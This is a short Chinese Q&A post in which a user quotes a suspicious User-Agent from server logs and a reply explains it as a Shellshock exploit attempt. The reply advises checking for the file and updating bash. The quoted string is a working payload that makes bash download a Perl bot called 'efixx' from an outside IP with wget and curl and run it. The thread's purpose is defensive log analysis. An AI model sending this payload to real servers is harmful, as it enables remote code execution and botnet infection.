我的日志显示了一个非常奇怪的用户代理,如下所示:
() { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx"
任何人都可以告诉它想要做什么......我认为这是黑客攻击,以及如何限制对它的访问。
答案 0 :(得分:0)
这确实看起来像是试图利用Shellshock bash bug。 https://security.stackexchange.com/questions/68122/what-is-a-specific-example-of-how-the-shellshock-bash-bug-could-be-exploited
该请求的发件人正试图让您的计算机从http://151.236.44.210/下载名为efixx的purl脚本,然后执行它。那个purl脚本是“LinuxNet perlbot”。
您应该检查以确保您的计算机上没有名为“efixx”的文件,并且确保它没有运行。还要确保你运行的是最新版本的bash,你应该没问题。